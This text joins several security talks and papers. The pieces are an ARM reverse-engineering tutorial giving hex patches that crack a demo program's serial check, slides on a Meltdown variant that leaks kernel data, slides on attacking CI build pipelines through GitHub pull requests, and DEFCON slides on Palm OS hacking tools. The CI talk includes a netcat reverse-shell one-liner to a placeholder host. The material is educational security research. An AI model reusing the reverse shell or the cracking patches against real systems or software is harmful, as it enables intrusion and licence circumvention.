Fortunately, we do not have to look far to find a weak point. The following explains the
rest of the code that is processed until a message is provide on the pocket pc alerting the
user to a correct, or incorrect serial number.
260112A8 mov
r2, #0
This opcode clears out the R2 register so there are no remaining values that could confuse
future operations.
260112AC movs
r3, r0
Moves R3 into R0 and updates the status flags.
Page 35 of 35 © 2003 Airscanner™
Corp. http://www.Airscanner.com
In this opcode, two events occur. The first is that R0 is moved into R3. The second event
updates the status flags using the new value in R3. As we previously mentioned, R0 and
is updated from the wcscmp function. If the entered serial number matched the correct
serial number, R0 will be updated with a 0. If they didn't match, R0 will be set to 1. R3 is
then updated with this value, which is check to see if it is negative or zero.
260112B0 mov
r0, #1
Move #1 into R0
Next, the value #1 is moved into R0. While this may seem a bit odd, by moving the #1
into R0, the program is setting the stage for the next couple lines of code.
260112B4 movne
r0, #0
If flags are not equal, move #0 into R0.
Again we see another altered mov command. In this case, the value #0 will only be
moved into R0 if the condition flags are not equal (ne), which is based on the status
update performed by the previous movs opcode. In other words, if the serials matched,
R0 would have been set at 0 and the Zero flag would have been set Z=1), which means
the movne opcode would not be executed.
260112B8 ands
r3, r0, 0xFF
Like the movs opcode, the ANDS command will first execute and then update the status
flags depending on the result. Looking at the last couple lines, we can see that R0 should
be 1 if the serials DID NOT matched. This is because R0 was set to equal #1 a few lines
up and was not changed by the MOVNE opcode. Therefore, the 'AND' opcode would
result in R3 being set to the value of #1 and the condition flags would be updated to
reflect the EQUAL status. On the other hand, if the serials did match, R0 would be equal
to 1, which would have caused the ZERO flag to be set to 0, or NOT EQUAL.
260112BC ldrne r1, [sp, #8]
Here we see another implementation of the 'not equal' conditional opcode. In this case, if
the ANDS opcode set the Z flag to 0, which would occur only if the string check passed,
the ldrne opcode would load R1 with the data in SP+8. If you recall from our dissection
of code in IDA Pro, you will should recall that address 0x0001125C loaded the 'correct
message' into this location of memory. However, if the condition flags are not set at 'not
equal' or ‘not zero’, this opcode will be skipped.
260112C0 mov r0, r4
Move R4 into R0
An example of a standard straightforward move of R4 into R0.
260112C4 mov r3, #0
Move #0 into R3
Another example of a simple move of #0 to R3.
Page 36 of 36 © 2003 Airscanner™
Corp. http://www.Airscanner.com
260112C8 bne 260112F4 ;
If flag not equal jump to 0x260112F4
Again, we see a conditional opcode. In this case, the program will branch to 0x000112F4
if the 'not equal' flag is set. Since the conditional flags have not been updated since the
'ANDS' opcode in address 0x000112B8, a correct serial number would result in the
execution of this opcode.
260112CC ldr r1, [sp, #4]
Load SP+4 into R1 (incorrect message)
If the wrong eight character serial number were entered, this line would load the
'incorrect message' from memory into R1.
260112D0 b 260112F4 ;
Jump to 0x260112F4
This line tells the program to branch to address 0x260112F4.
...
260112F4 bl 26011718 ;
MessageboxW call to display message in R1
The final line we will look at is the call to the Message Box function. This command
simply takes the value in R1, which will either be the correct message or the incorrect
message, and displays it in a Message Box.
5.10 The Cracks
Now that we have dissected the code, we need to determine how it can be altered to
ensure that it will accept any serial number as the correct value. As we have illustrated,
'cracking' the serial is a fairly easy task when executing the program in the MVC by
changing the register values, memory, or condition flags during program execution.
However, this type of manhandling is not going to help the average user who has no
interest in reverse-engineering. As a result, a cracker will have to make permanent
changes to the code to ensure the serial validation will ALWAYS validate the entered
serial.
To do this, the cracker has to find a weak point in the code that can be changed to bypass
security checks. Fortunately, for the cracker, there is typically more than one method by
which a program can be cracked. To illustrate, we will demonstrate three distinct ways
that serial.exe can be cracked using various cracking techniques.
5.10.1 Crack 1: Slight of Hand
The first method we will discuss requires three separate changes to the code. The first
change is at address 00011294 where R0 is compared to the #8. If you recall, this is used
to ensure that the user provided serial number is exactly eight characters long. The
comparison then updates the condition flags, which are used in the next couple lines to
determine the flow of the program.
To ensure that the flags are set at 'equal', we will need to alter the compared values. The
Page 37 of 37 © 2003 Airscanner™
Corp. http://www.Airscanner.com
easiest way to do this is to have the program compare two equal values (i.e. CMP R0,
R0). This will ensure the comparison returns as 'equal', thus tricking the program into
passing over the BLT and BGT opcodes in the next two lines.
The next change is at address 0x000112B4, where we find a movne r0, #0 command. As
we previously discussed, this command checks the flag conditions and if they are set at
'not equal', the opcode moves the value #0 into R0. The R0 value checked when it is
moved into R3, which updates the status flags once again.
Since the movs command at address 00112AC will set Z=0 (unless the correct serial is
entered), the movne opcode will execute, thus triggering a chain of events that will result
in a failed validation. To correct this, we will need to ensure the program thinks R0 is
always equal to ‘1’ at line 000112B8 (ands r3, r0, #0xFF). Since R0 would have been
changed to #1 in address 000112B0 (mov r0, #1), the ands opcode would result in a 'not
equal' for a correct serial.
In other words, we need to change movne r0, #0 to movne r0, #1 to ensure that R0 AND
FF outputs ‘1’, which is then used to update the status flags. By doing this, the program
will be tricked into validating the incorrect serial.
Changes:
.text:00011294 CMP R0, #8 -> CMP R0, R0
.text:000112B4 MOVNE R0, #0 -> MOVNE R0,#1
Determining the changes is the first step to cracking a program. The second step is to
actually alter the file. To do this, a cracker uses a hex editor to make changes to the actual
.exe file. However, in order to do this, the cracker must know where in the program file
they need to make changes. Fortunately, if they are using IDA Pro, a cracker only has to
click on the line they want to edit and look at the status bar at the bottom of IDA's
window. As figure 13 illustrate, IDA clearly informs its user what memory address the
currently selected line is located at in a the program, which can be then used in hex
editor.
Figure 13: Viewing location of 0x00011294 for use in hex editor.
Once we know the addresses where we want to make our changes, we will need to
determine the values that we will want to update the original hex code with. Fortunately,
there are several reference guides online that can help with this. In our case, we will want
to make the following changes to the serial.exe file.
IDA Addr
Hex Addr
Orig Opcode Org Hex
New Opcode New Hex
0x11294
0x694
Cmp r0, #8
08 00 50 E3
Cmp r0, r0
00 00 50 E1
0x112B4
0x6B4
Monve r0, #0 00 00 A0 13 Movne r0, #1 01 00 A0 13
Page 38 of 38 © 2003 Airscanner™
Corp. http://www.Airscanner.com
To make the changes, perform the following procedures (using UltraEdit).
1.Open UltraEdit and then open your local serial.exe file in UltraEdit.
2.Using the left most column, locate the desired hex address.
Note: You will not always be able to find the exact address in the hex editor. You will
need to count the character pairs from left to right to find the exact location once you
located the correct line.
3.Move to the hex code that needs changed, and over write it.
4.Save the file as a new file, in case you made a mistake.
5.10.2 Crack 2: The Slide
The next illustration uses some of the same tactics as Crack1, but also introduces a new
method of bypassing the eight-character validation, known as NOP.
The term NOP is a reference to a Non-OPeration, which means the code is basically null.
Many crackers and hackers are familiar with the term NOP due to its prevalence in buffer
overflow attacks. While this is outside the scope of this paper, a NOP sled (as it is often
called) is used to make a part of program do absolutely nothing. The same NOP sled can
be used when bypassing a security check in a program.
In our program, we have a cmp opcode that compares the length of the entered serial with
the number eight. This results in a status change of the condition flags, which are used by
the next two lines to determine if they are executed. While our previous crack bypassed
this by ensuring the flags were set at 'equal', we can attack the BLT and BGT opcodes by
overwriting them with a NOP opcode. Once we do this, the BLT and BGT opcodes will
no longer exist.
NOTE: Typical NOP code is done using a series of 0x90’s. This will NOT work on an
ARM processor and will result in the following opcode: UMULLLSS R9, R0, R0, R0.
This opcode performs an unsigned multiply long if the LS condition is met, and then
updates the status flags accordingly. It is not a NOP.
To perform a NOP on an ARM processor, you simply replace the target code with a
MOV R1, R1 operation. This will move the value R1 into R1 and will not update the
status flags. In other words, you are killing processor time.
The following code illustrates the NOPing of these opcodes.
.text:00011298 BLT loc_112E4 -> MOV R1, R1
.text:0001129C BGT loc_112E4 -> MOV R1, R1
The second part of this crack was already explained in Crack1, and only requires the
alteration of the MOVNE opcode as the following portraits.
Page 39 of 39 © 2003 Airscanner™
Corp. http://www.Airscanner.com
.text:000112B4 MOVNE R0, #0 -> MOVNE R0,#1
The following describes the changes you will have to make in your hex editor.
IDA Addr Hex Addr Orig Opcode
Org Hex
New Opcode
New Hex
0x11298
0x698
BLT loc_112E4 11 00 00 BA MOV R1, R1
01 10 A0 E3
0x1129C 0x69C
BLT loc_112E4 10 00 00 CA MOV R1, R1
01 10 A0 E3
0x112B4
0x6B4
Monve r0, #0
00 00 A0 13 MOVNE r0, #1
01 00 A0 13
5.10.3 Crack3: Preventative Maintenance
At this point you are probably wondering what the point is for another example when you
have two that work just fine. However, we have saved the best example for last because
crack3 does not attack or overwrite any checks or validation opcodes like our previous
two examples. Instead, we demonstrate how to alter the registers to our benefit before any
values are compared.
If you examine the opcode at 0x00001128C using the MVC, you will see that it sets R1
to the address of the serial that you entered. The length of the serial is then loaded into R0
in the next line using R1 as the input variable. If the value pointed to by the address in R1
is eight characters long, it is then bumped up against the correct serial number in the
wcscmp function. Knowing all this, we can see that the value loaded into R1 is a key
piece of data. So, what if we could change the value in R1 to something more agreeable
to the program, such as the correct serial?
While this is possible by using the SP to guide us, the groundwork has already been done
in 0x0000112A0 where the correct value is loaded into R0. Logic assumes that if it can
be loaded into R0 using the provided ldr command, then we can use the same command
to load the correct serial into R1. This would in effect trick our validation algorithm to
compare the correct serial with itself, which would always result in a successful match!
The details of the required changes are as follows.
IDA Addr Hex Addr
Orig Opcode Org Hex
New Opcode
New Hex
0x11298
0x68C
LDR R1, [R4,
#0x7C]
7C 10 94 E5 LDR R1,
[SP,#0xC]
0C 10 9D E5
Note that this crack only requires the changing of two hex characters (i.e. 7->0 & 4->D).
By far this example is the most elegant and fool proof, which is why we saved it for last.
While the other two examples are just as effective, they are a reactive type of crack that
attempts to fix a problem. This crack, on the hand, is a preventative crack that corrects
the problem before it becomes one.
6 Summary
Page 40 of 40 © 2003 Airscanner™
Corp. http://www.Airscanner.com
This short example of how crackers bypass protection schemes should illustrate quite
clearly the problems that programmers have to consider when developing applications.
While many programmers attempt to include complex serial validation schemes, many of
these eventually end up as a simple wcscmp call that can easily be 'corrected' by a
cracker. In fact, the wcscmp weakness is so common that it has been called 'the weakest
link' by one ARM hacker, in a nice paper available at www.Ka0s.net, which contains
more than enough information to bring a complete newbie up to speed on pocket pc
application reverse-engineering.
In closing, the subject of ARM reverse-engineering is somewhat new. While much has
been done in the way of Linux ARM debugging, the Pocket PC OS is relatively new
when compared to Intel based debugging. Ironically, the ARM processor is considered
easier to debug. So, get your tools together and dig in!
References
•www.ka0s.net
•www.dataworm.net
•http://www.eecs.umich.edu/speech/docs/arm/ARM7TDMIvE.pdf
•http://www.ra.informatik.uni-
stuttgart.de/~ghermanv/Lehre/SOC02/ARM_Presentation.pdf
•class.et.byu.edu/eet441/notes/arminst.ppt
•http://www.ngine.de/gbadoc/armref.pdf
•http://wheelie.tees.ac.uk/users/a.clements/ARMinfo/ARMnote.htm
•http://www3.mb.sympatico.ca/~reimann/andrew/asm/armref.pdf
•www.arm.com
•www.airscanner.com | pdf |
Mission Impossible
Steal Kernel Data from User Space
Yueqiang)Cheng,)Zhaofeng)Chen,)Yulong)Zhang,)Yu)Ding,)Tao)Wei)
Baidu)Security)
About Speakers
Dr.$Tao$Wei$
Dr.$Yueqiang$Cheng$
Mr.$Zhaofeng$Chen$
Mr.$Yulong$Zhang$
Dr.$Yu$Ding$
Our)Security)Projects:)
How to Read Unauthorized Kernel Data
From User Space?
$$
Strong Kernel-User Isolation (KUI)
Enforced by MMU via Page Table
Why is Hard?
Assume Kernel has NO implementation bug:
No kernel vulnerability to arbitrarily read kernel data
Memory Access in KUI
Lookup TLB
Fetch
Page Table
Update TLB
Protection
Check
Miss
Hit
Denied
Permitted
Protection
Fault
SIGSEGV
Physical
Address
Virtual Address
Permission Checkings
2: Control Registers, e.g., SMAP in CR4
1: Page Table Permissions
Image from Intel sdm
1. Unprivileged App +
2. KUI Permission Checking +
3. Bug-free Kernel
No Way to Go?
However, in order to
gain high performance,
CPU …
1. Unprivileged App +
2. Permission Checking +
3. Bug-free Kernel
Microarchitecture$
Speculative)Execution)+)Out-of-order)
Execution$
Speculative Execution
S$
F$
T$
E$
No$Speculative$Execution$
Misprediction$
Correct$Prediction$
Out-of-order Execution
Images$are$from$Dr.$Lihu$Rappoport$
Speculative)Execution)+))
Out-of-order)Execution))
Enough?)
Not)Enough)!!!))
Delayed Permission Checking
+ Cache Side Effects
Permission)checking)
is)delayed)to)Retire)
Unit$
Image$from$https://www.cse.msu.edu/~enbody/postrisc/postrisc2.htm$
Branch)Predictor)in)
Front)End)Serving)
Speculative)Execution$
Execution)Engine)
executes)in)a)out-
of-order)way$
Side effects in
cache are still
there!!!
1. The content of an attacker-chosen memory
location, which is inaccessible to the attacker, is
loaded into a register.
$
Point)to)the)target)
kernel)address)
How
Meltdown
(v3) Works
How
Meltdown
(v3)
Works
2. A transient instruction accesses a cache line
based on the secret content of the register.
$
Bring)data)into)
cache)
This)number)
should)>=)0x6)
3. The attacker uses Flush+Reload to determine the
accessed cache line and hence the secret stored at
the chosen memory location.
$
ArrayBase$
256$Slots$
0$
1$
2$
254$
255$
The)selected)index)is)the)value)of)the)target)byte)
e.g.,$if$the$selected$index$is$0x65,$the$value$is$‘A’))
How
Meltdown
(v3) Works
ForeShadow Attack
Put secrets in L1
Unmap Page Table Entry
Meltdown
$$
How about Spectre (v1/v2)?
How
Spectre (v1)
Works
1. The setup phase, in which the processor is mistrained to
make "an exploitable erroneous speculative prediction."
e.g., x < array1_size
$
Point)to)the)
target)address)
Slot)index)of)
array2)leaks)
data)
Real)Execution)flow)
and)Speculative)
Execution)go)here)
2. The processor speculatively executes instructions from
the target context into a microarchitectural covert channel.
e.g., x > array1_size
Execution)flow)
should)go)here)
Speculative)
Execution)goes)
here!)
A)slot)of)array2)is)loaded)
into)cache)
How
Spectre (v1)
Works
3: The sensitive data is recovered. This can be done by
timing access to memory addresses in the CPU cache.$
Array2Base$
256$Slots$
0$
1$
2$
254$
255$
The)selected)index)is)the)value)of)the)target)byte)
e.g.,$if$the$selected$index$is$0x66,$the$value$is$‘B’))
How
Spectre
Works
$$
How Spectre Read Kernel Data
array1+x'points)to))
secret)
ü array1 and array2 are in user-space
ü x is controlled by the adversary
Slot)index)of)
array2)leaks)
kernel)data)
1. Unprivileged App +
2. Permission Checking +
3. Bug-free Kernel
Happy! We Get Kernel Data Now
SMAP$
Spectre))
(Gadget)in)Kernel)Space)))
However...
KPTI$
Meltdown)
Spectre)(Gadget)in)User)Space))$
Kernel$
Space$
PCID)helps)performance))
Before)KPTI)
User$
Space$
Kernel$
Space$
User$
Space$
Kernel$
Space$
User$
Space$
After)KPTI)
User/kernel)mode)
kernel)mode)
User)mode)
KPTI
Even we put the Spectre
gadget into the kernel
space, SMAP will stop it
SMAP
Supervisor$
Mode$$
(kernel$Space)$
User$Mode$
(User$Space)$
ü SMAP is enabled when the SMAP bit in
the CR4 is set
ü SMAP can be temporarily disabled by
setting the EFLAGS.AC flag
ü SMAP checking is done long before
retirement or even execution
Attack and Mitigation Summary
Techniques)
Steal)
Kernel)
Data?)
Mitigations)
After)
Mitigation,)
kern.)Data)
Leakage?)
Spectre$
Yes$
KPTI$+$SMAP$
NO$
Meltdown$
Yes$
KPTI$
NO$
ForeShadow$
Yes$
KPTI$
NO$
Only for Kernel Data Leakage. For other aspects, the summary is not included here.
Despair...
KPTI + SMAP + KUI
Image$from$http://nohopefor.us/credits$
Before)KPTI)
User$
Space$
Kernel$
Space$
After)KPTI)
User/kernel)mode)
Hope in Despair
Shared)range$$
as$a$bridge)to$
leak$kernel$data$
User$
Space$
Kernel$
Space$
User$
Space$
kernel)mode)
User)mode)
Kernel$
Space$
This)part)cannot)
be)eliminated)
Breaking SMAP + KPTI + user-kernel Isolation
1: Use new gadget to build data-
dependence between target kernel data
and the bridge (bypass SMAP)
2: Use Reliable Meltdown to probe
bridge to leak kernel data
(bypass KPTI and KUI)
New Variant Meltdown v3z
1st Step: Trigger New Gadget
Similar to Spectre gadget, but not exact the same
Point)to)the)
target)address)
Arr2+offset'is)the)
base)of)”bridge”)
x)and)offset)should)be)controlled)by)the)adversary!!)
Slot'index'of)
“bridge”))
How to Trigger the New Gadget
There are many sources to trigger the new gadget
1: Syscalls
2: /proc and /sys etc. interfaces
3: Interrupt and exception handlers
4: eBPF
5: …
How to Find the New Gadget
Source Code Scanning
We use smatch for Linux Kernel 4.17.3,
Ø Default config: 36 gadget candidates
Ø Allyes config: 166 gadget candidates
However, there are many restrictions to the gadget in real exploits
ü Offset range
ü Controllable invocation
ü Cache noise
ü …
Binary Code Scanning??
2nd Step: Probe Bridge
UserArrayBas
e$
0$
1$
2$
254$
255$
BridgeBase)
0$
1$
2$
254$
255$
User Space
Obviously, in each round there are (256*256) probes
To make the result reliable, usually we need multiple rounds
Bridge
Inefficient
Make it Practical/Efficient
UserArrayBas
e$
0$
1$
2$
254$
255$
BridgeBase)
0$
1$
2$
254$
255$
Why do we need to probe 256 times in Meltdown?
If we know the value of the slot 0 of the BridgeBase, we probe it only once.
Can we know the values in advance?
User Space
Bridge
No for Meltdown (v3)
Meltdown is able to read kernel data.
But, it requires that the target data is in the CPU L1d cache.
If the target data is NOT in L1d cache, 0x00 returns.
We need reliably reading kernel data!
Reliable Meltdown (V3r)
We$test$it$on$Linux$4.4.0$with$Intel$CPU$E3-1280$v6,$and$MacOS$
10.12.6$(16G1036)$with$Intel$CPU$i7-4870HQ$
V3r has two steps:
1st step: bring data into L1d cache
2nd step: use v3 getting data
Point)to)the)
target)address)
Everywhere))
in)kernel)
Put Everything Together
Offline phase:
Ø Use v3r dumping bridge data, and save them into a table
Online phase:
Ø 1st step: Build data dependence between target data and
bridge slot
Ø 2nd step: Probe each slot of the bridge
Efficiency:
Ø from several minutes (even around 1 hour in certain
cases) to only several seconds to leak one byte.
Demo Settings
Kernel:$Linux$4.4.0$with$SMAP$+$KPTI$
CPU:$Intel$CPU$E3-1280$v6$
In kernel space, we have a
secret msg, e.g., xlabsecretxlabsecret,
location is at, e.g., 0xffffffffc0e7e0a0
Countermeasure Discussions
Software Mitigations
ü Patch kernel to eliminate all expected gadgets
ü Minimize the shared “bridge” region
ü Randomize the shared “bridge” region
ü Monitor cache-based side channel activities
Countermeasure Discussions
Hardware Mitigations
ü Do permission checking during or even execution stage
ü Revise speculative execution and out-of-order execution
ü Use side channel resistant cache, e.g., exclusive/random cache
ü Add hardware-level side channel detection mechanism
Take Away
• Trinational Spectre and Meltdown can NOT steal kernel
data with KPTI + SMAP + KUI enabled.
• Our new Meltdown variants is able to break the
strongest protection (KPTI + SMAP + KUI).
• All existing kernels need to be patched to mitigate our
new attack
Mission Impossible
Steal Kernel Data from User Space
Q&A$image$is$from$https://i.redd.it/wbiwgnokgig11.jpg$
Yueqiang)Cheng)))
Baidu)Security) | pdf |
Exploiting Continuous
Integration (CI) and
Automated Build Systems
And introducing CIDER
Whoami
• SpaceB0x
• Sr.+Security+Engineer+at+LeanKit
• Application+and+network+security+(offense+and+defense)
• I+like+breaking+in+to+systems,+building+systems,+and+learning
• Security+consultant
./agenda.sh
• Overview+of+Continuous+Integration+concepts
• Configuration+Vulnerabilities+vs.+Application+Vulnerabilities
• Real+world+exploit+#1+
• Common+Bad-practices
• Real+world+exploit+#2+– Attacking+the+CI+provider
• Introduce+CIDER
Continuous1Integration1
Continuous1Integration1(CI)
• Quick+iterative+release+of+code+to+production+servers
• Usually+Many+iterations+per+week+or+even+per+day.+
• Repository+centric
• In+sync+with+Automated+Build
• For+infrastructure/servers/subnets+etc.+
Microservices
• Breaking+down+large+app+into+small+decoupled+components
• These+components+interact+with+each+other
• Eliminates+single+points+of+failure
• Autonomous+development
Security1Implications
• Good+- Frequent+release+cycles+are+fabulous!
• Good+- Faster+code+deployments+=+quick+remediation
• Good+- Decoupled+systems+reduced+single+points+of+failure
• Good+- Compromise+of+one+service+doesn’t+(always)+mean+full+pwnage
Security1Implications
• Good+- Frequent+release+cycles+are+fabulous!
• Good+- Faster+code+deployments+=+quick+remediation
• Good+- Decoupled+systems+reduced+single+points+of+failure
• Good+- Compromise+of+one+service+doesn’t+(always)+mean+full+pwnage
• Bad+- Fast+release+sometimes+means+hasty+oversights
• Bad+– Automated+Deployment+systems+arechecked less+than+the+code+
that+they+deploy+
Tools
Build1Systems
• Take+code+and+build+conditionally
• Typically+in+a+quasi+containerized+type+of+environment
• Both+local+and+cloud+based+are+popular
• Vendor:
ØTravis-CI
ØCircle-CI
ØDrone
ØTeamCity
ØBuildKite
Deployment1Systems
• Deploy+the+code+after+build
• Heading+more+and+more+toward+container+driven
• Vendors
ØJenkins
ØOctopus+Deploy
ØKubernetes
ØRancher
ØMesosphere
Chains1of1Deployment
Chains1of1Deployment
Chains1of
deployment
Checks1in1the1SDLC
• Build+test+before+merges
• Web-hooks+trigger+specific+actions+based+on+conditions
• Services+configured+without+regard+to+one+another
Configuration1Problems
GitHub1– Huge1attack1surface
• Pull+requests+and+commits+trigger+builds
• Build+configurations+normally+in+root+of+repo
• Thus+build+config change+can+be+part+of+PR+or+commit
• Gain+control+of+multiple+systems+through+pull+requests
Vulnerabilities1are1in1Misconfiguration
• Creative+configuration+exploitation
• Vuln stacking+at+it’s+finest
• Each+individual+service+may+be+functioning+exactly+as+intended
• Interaction+between+services+is+where+many+vulnerabilities+lie
External1Repos
• Most+volatile+attack+surface
• Public+repositories+which+map+to+internal+build+services
Real1World1Hax #1
mknod /tmp/backpipe p
mknod /tmp/backpipe p
/bin/sh 0</tmp/backpipe|nc x.x.x.x 4444 1>/tmp/backpipe
mknod /tmp/backpipe p
/bin/sh 0</tmp/backpipe|nc x.x.x.x 4444 1>/tmp/backpipe
nc –l 4444
root
Bad-Practices
Worst-Practices
Environment1Vars
• Being+used+to+store+credentials
• Storing+metadata+for+other+services+within+micro-service+
infrastructure
Run1everything1as1root
• Just+a+container,+right+guyz?
• You+now+have+internal+network+access
• Full+control+to+build+augment+the+image
CI1Provider1Info1leak
• Problems+with+the+CI+Providers+themselves
• Leak+SSH+keys,+etc.+which+can+compromise+other+customers+on+host
• CI+providers+have+at+least+some+permissions+to+GitHub+repos
• Cloud+based+CI+providers+have+a+hosting+environment
• Speaking+of+which…
Real1World1Hax #2
Introducing1CIDER
What1is1CIDER?
•Continuous+Integration+and+Deployment+ExploiteR
What1is1CIDER?
•Continuous+Integration+and+Deployment+ExploiteR
• Framework+for+exploiting+and+attacking+CI+build+chains
What1is1CIDER?
•Continuous+Integration+and+Deployment+ExploiteR
• Framework+for+exploiting+and+attacking+CI+build+chains
• Mainly+leverages+GitHub+as+attack+surface+to+get+to+build+services
What1is1CIDER?
•Continuous+Integration+and+Deployment+ExploiteR
• Framework+for+exploiting+and+attacking+CI+build+chains
• Mainly+leverages+GitHub+as+attack+surface+to+get+to+build+services
• Takes+the+mess+out+forking,+PR-ing,+callbacking
What1is1CIDER?
•Continuous+Integration+and+Deployment+ExploiteR
• Framework+for+exploiting+and+attacking+CI+build+chains
• Mainly+leverages+GitHub+as+attack+surface+to+get+to+build+services
• Takes+the+mess+out+forking,+PR-ing,+callbacking
• It+will+poison+a+handful+of+build+services+and+”exploits”+for+each+one
Why1CIDER?
• Fun
• Make+attacking+easy
• Awareness
• RottenApple by+@claudijd
• Facilitate+further+research
CIDER1overview
CIDER1– ‘help’
CIDER1– ‘add1target’1&1‘list1targets’
CIDER1– ‘load’1and1‘info’
CIDER1features
• Node.JS
• Build+modularly
• Can+handle+bulk+lists+of+target+repos
• Clean+up+for+GitHub+repo+craziness
• Ngrok – because+port+forwarding+and+public+IPs+suck
Ngrok
Disclaimer
• It+is+against+the+GitHub+user+agreement+to+test+against+a+repository,+
even+if+you+have+permission+from+the+owner+of+the+repo
• You+must+be+the+owner+to+test+a+repo
• When+testing+ask+them+to+make+you+an+owner
WINK+WINK
DEMO
Limitations
• Build+Queues
• GitHub+Noise
• Timeouts
• Repo+API+request+throttling
Just1the1beginning…
• More+CI-Frameworks
• Start+tackling+deployment+services
• Start+exploring+other+entrypoints
• Other+code+repositories
• ChatOps (Slack)
Thanks
• LeanKit+Operations+Team
• Evan+Snapp
• @claudijd
Fin
CIDER+on+Github:
https://github.com/spaceB0x/cider
Twitter:+@spaceB0xx
www.untamedtheory.com | pdf |
Hacking from the
Palm of your Hand
Paul Clip
DEFCON - August 01, 2003
P R O P R I E T A R Y B U T N O T C O N F I D E N T I A L
© 2 0 0 3 @ S T A K E , I N C .
Agenda
Goals
Past
–
Overview of the Palm Platform
–
Hacker Tools on the Palm
Present
–
AUSTIN - A Palm OS Vulnerability Scanner
–
Architecture
–
Features
–
Demos
–
But wait, there’s more!!!
Future
–
New Features
P R O P R I E T A R Y B U T N O T C O N F I D E N T I A L
© 2 0 0 3 @ S T A K E , I N C .
Goals
Overview of Palm OS as a hacking platform
Walkthrough of a Palm OS-based vulnerability scanner
–
Architecture
–
Features & how they’re implemented
–
Lessons learned
Release a new tool for Palm OS
Have Fun!
P R O P R I E T A R Y B U T N O T C O N F I D E N T I A L
© 2 0 0 3 @ S T A K E , I N C .
The Past
Trivia Questions:
What was the first
Palm Pilot called?
How much memory
did it have?
P R O P R I E T A R Y B U T N O T C O N F I D E N T I A L
© 2 0 0 3 @ S T A K E , I N C .
The Palm Platform
Old
–
Motorola 68K processor
–
Max speed 66MHz
–
RAM 2-16MB
–
Typical resolution 160^2
–
Some color, some b/w screens
–
Serial/USB port
–
IR
–
Some expansion slots
–
PalmOS 4.x and below
New
–
ARM processor
–
Max speed 150? 200? 400?
MHz
–
RAM 16-32MB
–
Typical resolution 320^2
–
All color
–
USB port
–
IR
–
Expansion slots
–
PalmOS 5.x and above
P R O P R I E T A R Y B U T N O T C O N F I D E N T I A L
© 2 0 0 3 @ S T A K E , I N C .
Security Tools
Password Generators
http://www.freewarepalm.com/utilities/passgen.shtml
http://www.freewarepalm.com/utilities/passphrase.shtml
Encryption
http://cryptopad.sourceforge.net/
http://linkesoft.com/secret/
Password Crackers (old)
http://atstake.com/research/tools/password_auditing/
War Dialer
http://atstake.com/research/tools/info_gathering/
P R O P R I E T A R Y B U T N O T C O N F I D E N T I A L
© 2 0 0 3 @ S T A K E , I N C .
Communication Tools
Telnet
http://netpage.em.com.br/mmand/ptelnet.htm
SSH (v1 only)
http://online.offshore.com.ai/~iang/TGssh/
Web & Mail
http://www.eudora.com/internetsuite/
Ping
http://www.mergic.com/vpnDownloads.php
P R O P R I E T A R Y B U T N O T C O N F I D E N T I A L
© 2 0 0 3 @ S T A K E , I N C .
Communication Tools (continued)
FTP
http://lthaler.free.fr/
IR Tools
http://pamupamu.tripod.co.jp/soft/irmenu/irm.htm
http://www.harbaum.org/till/palm/ir_ping/
http://www.pacificneotek.com/omniProfsw.htm
P R O P R I E T A R Y B U T N O T C O N F I D E N T I A L
© 2 0 0 3 @ S T A K E , I N C .
Dev Tools
RPN Calculator
http://nthlab.com/
Longtime
Search on http://palmgear.com/
Filez
http://nosleep.net/
RsrcEdit
http://quartus.net/products/rsrcedit/
OnBoard C
http://onboardc.sourceforge.net/
P R O P R I E T A R Y B U T N O T C O N F I D E N T I A L
© 2 0 0 3 @ S T A K E , I N C .
Useful/Interesting Hardware
Serial/USB cable
Keyboard
GPS
Modem
Expansion slot gadgets
Tilt switch
IR booster
Speedometer
Robotics
…
P R O P R I E T A R Y B U T N O T C O N F I D E N T I A L
© 2 0 0 3 @ S T A K E , I N C .
The Present
Trivia Question:
How many Palm OS
handhelds are in the
market today?
P R O P R I E T A R Y B U T N O T C O N F I D E N T I A L
© 2 0 0 3 @ S T A K E , I N C .
Palm Vulnerability Scanner
Why?
What?
– TCP & UDP scanning
– Multiple hosts/ports
– Banner grabbing
– Save results in re-useable format
– Standalone/self-contained program
What about other scanners?
P R O P R I E T A R Y B U T N O T C O N F I D E N T I A L
© 2 0 0 3 @ S T A K E , I N C .
Choosing a Development Environment…
C / C++
Assembly
CASL
AppForge
NS Basic
Satellite Forms
DB2 Personal App Builder
Java (many flavors)
Forth
PocketStudio (Pascal)
PocketC
Smalltalk
Perl
Python
Even more tools at: http://www.palmos.com/dev/tools/
P R O P R I E T A R Y B U T N O T C O N F I D E N T I A L
© 2 0 0 3 @ S T A K E , I N C .
Technical Features
Must have
– Leverage Palm UI
– Responsive
– Extensible
– Development on PC
Nice to have
– Development on Palm
Most important
– Re-use other components
PocketC
P R O P R I E T A R Y B U T N O T C O N F I D E N T I A L
© 2 0 0 3 @ S T A K E , I N C .
PocketC Overview
Interpreted C-like language
Variable types: int, float, char,
string, pointer
Multi-dimensional arrays
Structs possible through a
(minor) hack
Reasonably fast
Allows development on Palm
+ PC platforms
Extensible
Example:
//helloworld.pc
main()
{
puts(“Hello world!\n”);
}
http://www.orbworks.com/pcpalm/index.html
P R O P R I E T A R Y B U T N O T C O N F I D E N T I A L
© 2 0 0 3 @ S T A K E , I N C .
Extending PocketC
Can be done in two ways
– PocketC include files
– Native (C/C++) libraries
Must-have PocketC library
– Pocket Toolbox by Joe Stadolnik
http://www.geocities.com/retro_01775/PToolboxLib.htm
– Features:
Full access to Palm OS GUI functions
Database functions
Graphic functions
Much more...
P R O P R I E T A R Y B U T N O T C O N F I D E N T I A L
© 2 0 0 3 @ S T A K E , I N C .
Presenting… AUSTIN
AUSTIN stands for
– At Stake
– Ultralight
– Scanning
– Tool (for the)
– Inter-
– Net
P R O P R I E T A R Y B U T N O T C O N F I D E N T I A L
© 2 0 0 3 @ S T A K E , I N C .
AUSTIN Architecture
Palm Hardware
Palm OS
PocketC
Pocket Toolbox
AUSTIN NetLib
…
Scan.h
GUI.h
AUSTIN
Net.h
Prefs.h
P R O P R I E T A R Y B U T N O T C O N F I D E N T I A L
© 2 0 0 3 @ S T A K E , I N C .
Tools Used To Develop AUSTIN
POSE - Palm OS Emulator
http://www.palmos.com/dev/tools/emulator/
PDE - PocketC Desktop Environment
http://www.orbworks.com/pcpalm/index.html
PRC-Tools - Includes gcc and other tools used to
create Palm executables
http://prc-tools.sourceforge.net/
Palm SDK
http://www.palmos.com/dev/tools/sdk/
PilRC
http://www.ardiri.com/index.php?redir=palm&cat=pilrc
Lesson Learned:
When adding PRCs
to POSE always do
so when the Palm is
displaying
Applications.
